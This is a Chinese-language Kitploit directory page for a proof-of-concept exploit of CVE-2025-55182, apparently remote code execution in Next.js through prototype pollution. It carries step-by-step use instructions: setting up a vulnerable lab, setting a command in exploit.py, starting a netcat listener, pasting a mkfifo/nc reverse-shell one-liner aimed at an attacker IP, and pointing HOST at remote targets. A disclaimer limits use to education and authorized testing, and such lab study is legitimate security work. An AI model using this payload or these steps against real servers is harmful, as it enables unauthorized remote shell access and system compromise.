Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
React2Shell-CVE-2025-55182 — 关于 CVE-2025-55182 的概念验证漏洞利用程序,演示了通过原型污染在 Next.js 中实现远程代码执行。包含一个预配置的易受攻击实验环境,用于授权测试和反向 Shell 生成。 | Kitploit
工具/GitHubGitHub/rahul-securify/react2shell-cve-2025-55182
Payload生成漏洞利用Web应用程序漏洞利用CTF学习与教育实验室与实践
GitHubrahul-securify/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

关于 CVE-2025-55182 的概念验证漏洞利用程序,演示了通过原型污染在 Next.js 中实现远程代码执行。包含一个预配置的易受攻击实验环境,用于授权测试和反向 Shell 生成。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
8个月前尚未审核

React2Shell CVE-2025-55182

一个概念验证漏洞利用,演示了通过React服务器组件渲染管道中的原型污染导致Next.js应用程序中存在远程代码执行漏洞。

⚠️ 免责声明

此工具仅用于教育和授权测试目的。未经授权针对您不拥有或未经许可测试的系统使用是违法的。

📋 先决条件

  • Node.js(v16或更高版本)
  • Python 3.6+
  • netcat(用于反弹shell)
  • 一个易受攻击的Next.js应用程序(包含在此仓库中)

🚀 快速开始

选项1:使用预配置的实验室

1. 克隆仓库

root@kitploit:~
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182

选项2:从头创建服务器

root@kitploit:~
# Create a new Next.js app with the vulnerable version
npm create [email protected] react2shell-lab
# Accept all defaults when prompted
cd react2shell-lab

注意:预配置的实验室已包含必要的易受攻击代码。如果从头创建,您需要手动添加易受攻击的组件。

2. 安装依赖

root@kitploit:~
cd react2shell-lab
npm install

3. 启动易受攻击的服务器

在终端1中:

root@kitploit:~
npm run dev

服务器应启动在 http://localhost:3000

🔧 利用

基本命令执行

  1. 仓库包含一个 exploit.py 文件,演示了该漏洞。编辑文件中的 COMMAND 变量为您想要的命令:

    root@kitploit:~
    COMMAND = 'whoami'  # Change this to any command you want to execute
    
  2. 运行漏洞利用:

    root@kitploit:~
    python3 exploit.py
    

反弹Shell

  1. 在一个新终端中设置netcat监听器:

    root@kitploit:~
    nc -nvlp 4444
    
  2. 编辑 exploit.py 并将命令更新为您的反弹shell载荷:

    root@kitploit:~
    COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f'
    

    将 YOUR_IP 替换为您本地机器的IP地址。

  3. 运行漏洞利用:

    root@kitploit:~
    python3 exploit.py
    

🛠️ 高级用法

测试远程目标

编辑漏洞利用脚本中的 HOST 变量以针对远程服务器:

root@kitploit:~
HOST = 'target-ip-address'  # Replace with target IP
PORT = 3000  # Default Next.js port

常用命令

  • 列出目录内容:ls -la
  • 获取系统信息:uname -a
  • 获取当前用户:whoami
  • 获取网络信息:ifconfig 或 ip a

🔍 故障排除

  • 连接被拒绝:确保目标服务器正在运行并可访问
  • 命令未找到:目标系统可能未安装某些二进制文件
  • 无输出:命令可能已执行但未产生任何输出

📚 参考资料

  • CVE-2025-55182
  • Next.js 安全公告
  • JavaScript中的原型污染

📄 许可证

本项目采用MIT许可证 - 详见 LICENSE 文件。

此版本要求用户输入远程目标和攻击者IP及端口。此版本中的POST正文(body_parts)也略有缩减。

来源:

https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained

https://tryhackme.com/room/react2shellcve202555182

下载工具